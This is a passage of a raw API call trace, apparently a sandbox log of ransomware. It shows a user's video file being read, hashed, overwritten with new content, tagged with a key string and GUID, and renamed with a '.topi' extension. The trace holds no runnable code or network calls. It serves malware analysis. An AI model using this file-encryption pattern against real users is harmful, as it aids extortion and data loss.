HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\sAsxhx217z\\sFJurkoQTJwuNyD54_K\\WshG32B.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\z4k8szrnngs3ve7w-\\sasxhx217z\\sfjurkoqtjwunyd54_k\\wshg32b.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0099.147] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=55214) returned 1 [0099.147] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0099.150] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xd788, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.150] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0099.151] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df3c0) returned 1 [0099.152] CryptCreateHash (in: hProv=0x6df3c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0099.152] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0099.152] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0099.152] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0099.152] GetLastError () returned 0x0 [0099.152] CryptDestroyHash (hHash=0x31c7580) returned 1 [0099.152] CryptReleaseContext (hProv=0x6df3c0, dwFlags=0x0) returned 1 [0099.152] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0099.152] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0099.152] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0099.152] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0099.152] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0099.152] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0099.152] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0099.152] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xd7b0) returned 0x9a06a00 [0099.153] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0099.153] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0099.153] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0099.153] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0099.153] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0099.153] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0099.153] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fc1d8 [0099.153] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5240 [0099.153] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fc220 [0099.153] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5258 [0099.153] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5288 [0099.153] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0099.153] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e52a0 [0099.153] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0099.153] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0099.153] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e8eb0 [0099.153] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0099.153] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5288 | out: hHeap=0x680000) returned 1 [0099.153] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e52a0 | out: hHeap=0x680000) returned 1 [0099.153] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0099.153] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0099.153] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0099.153] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0099.153] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9a8 [0099.153] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e52a0 [0099.153] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0099.153] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e5288 [0099.153] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9d8 [0099.153] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0099.153] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0099.153] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0099.154] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0099.154] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0099.154] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0099.154] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0099.154] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0099.154] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e52a0 | out: hHeap=0x680000) returned 1 [0099.154] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0099.154] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5288 | out: hHeap=0x680000) returned 1 [0099.154] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0099.154] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0099.154] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0099.154] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0099.154] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0099.154] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0099.154] GetCurrentThreadId () returned 0x8c4 [0099.154] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0099.154] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99e3a90 [0099.154] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0099.154] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df3c0 [0099.154] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x3112760 [0099.154] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0099.154] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0099.154] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0099.154] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0099.154] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0099.154] GetCurrentThreadId () returned 0x8c4 [0099.154] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0099.154] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0099.154] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03438 [0099.154] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0099.154] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0099.154] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0099.154] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0099.154] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0099.155] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0099.155] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0099.155] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0099.155] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0099.155] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0099.155] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0099.155] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0099.155] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0099.155] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0099.155] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0099.155] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0099.155] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0099.155] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0099.155] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0099.155] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0099.155] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5288 [0099.155] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0099.155] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0099.155] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0099.155] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0099.155] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0099.155] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0099.155] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0099.155] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e52a0 [0099.155] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0099.155] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0099.155] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0099.155] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5270 [0099.155] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0099.155] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0099.155] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0099.155] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0099.155] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0099.155] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0099.156] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0099.156] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e52b8 [0099.156] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0099.156] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4a30 [0099.156] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0099.156] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0099.156] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0099.156] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0099.156] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0099.156] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0099.156] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5288 | out: hHeap=0x680000) returned 1 [0099.156] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5288 [0099.156] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0099.156] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e8eb0 [0099.156] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0099.156] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191cf0 [0099.156] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0099.156] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9300 [0099.156] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0099.156] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0099.156] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0099.156] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0099.156] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5288 | out: hHeap=0x680000) returned 1 [0099.156] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0099.156] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191cf0 | out: hHeap=0x680000) returned 1 [0099.156] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0099.156] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0099.156] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df3c0 | out: hHeap=0x680000) returned 1 [0099.156] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0099.157] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0099.157] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0099.157] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0099.157] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0099.157] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0099.157] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0099.157] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0099.157] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e52b8 | out: hHeap=0x680000) returned 1 [0099.157] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0099.157] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0099.157] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0099.157] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e52a0 | out: hHeap=0x680000) returned 1 [0099.157] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5270 | out: hHeap=0x680000) returned 1 [0099.157] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3112760 | out: hHeap=0x680000) returned 1 [0099.157] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0099.157] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0099.157] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5258 | out: hHeap=0x680000) returned 1 [0099.157] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99fc220 | out: hHeap=0x680000) returned 1 [0099.157] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0099.157] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0099.157] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0099.157] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0099.157] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0099.157] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0099.157] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0099.157] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0099.157] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0099.157] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0099.157] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0099.157] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0xd7a9, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0xd7a9, lpOverlapped=0x0) returned 1 [0099.158] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0099.158] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xd7ae, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.158] WriteFile (in: hFile=0x6a8, lpBuffer=0x99df068*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99df068*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0099.158] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0099.158] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d8a8 [0099.158] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x9a04420 [0099.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9a04420, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0099.158] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d01f0 [0099.158] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0099.158] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d8a8 | out: hHeap=0x680000) returned 1 [0099.158] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d01f0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d01f0*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0099.158] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0099.158] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0099.158] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0099.158] CloseHandle (hObject=0x6a8) returned 1 [0099.160] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xf0) returned 0x9a03438 [0099.160] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8f0) returned 0x31cf750 [0099.160] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0099.160] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\sAsxhx217z\\sFJurkoQTJwuNyD54_K\\WshG32B.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\z4k8szrnngs3ve7w-\\sasxhx217z\\sfjurkoqtjwunyd54_k\\wshg32b.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\sAsxhx217z\\sFJurkoQTJwuNyD54_K\\WshG32B.flv.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\z4k8szrnngs3ve7w-\\sasxhx217z\\sfjurkoqtjwunyd54_k\\wshg32b.flv.topi")) returned 1 [0099.160] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0099.160] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0099.160] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.161] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0099.161] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe077e110, ftCreationTime.dwHighDateTime=0x1d5c168, ftLastAccessTime.dwLowDateTime=0x8384c680, ftLastAccessTime.dwHighDateTime=0x1d5bc9a, ftLastWriteTime.dwLowDateTime=0x8384c680, ftLastWriteTime.dwHighDateTime=0x1d5bc9a, nFileSizeHigh=0x0, nFileSizeLow=0xd7ae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WshG32B.flv", cAlternateFileName="")) returned 0 [0099.162] FindClose (in: hFindFile=0x31c7500 | out: hFindFile=0x31c7500) returned 1 [0099.162] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f40 | out: hHeap=0x680000) returned 1 [0099.162] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3134738 | out: hHeap=0x680000) returned 1 [0099.162] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0099.162] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4090 | out: hHeap=0x680000) returned 1 [0099.162] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ef00 | out: hHeap=0x680000) returned 1 [0099.162] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311ee78 | out: hHeap=0x680000) returned 1 [0099.162] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311edc0 | out: hHeap=0x680000) returned 1 [0099.162] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311f0a0 | out: hHeap=0x680000) returned 1 [0099.162] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311f158 | out: hHeap=0x680000) returned 1 [0099.162] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df338 | out: hHeap=0x680000) returned 1 [0099.162] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4680 | out: hHeap=0x680000) returned 1 [0099.162] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b3f60 | out: hHeap=0x680000) returned 1 [0099.162] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311efe8 | out: hHeap=0x680000) returned 1 [0099.162] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317f1a0 | out: hHeap=0x680000) returned 1 [0099.162] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8138 | out: hHeap=0x680000) returned 1 [0099.162] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6edd00 | out: hHeap=0x680000) returned 1 [0099.162] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317f1a0 [0099.162] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) 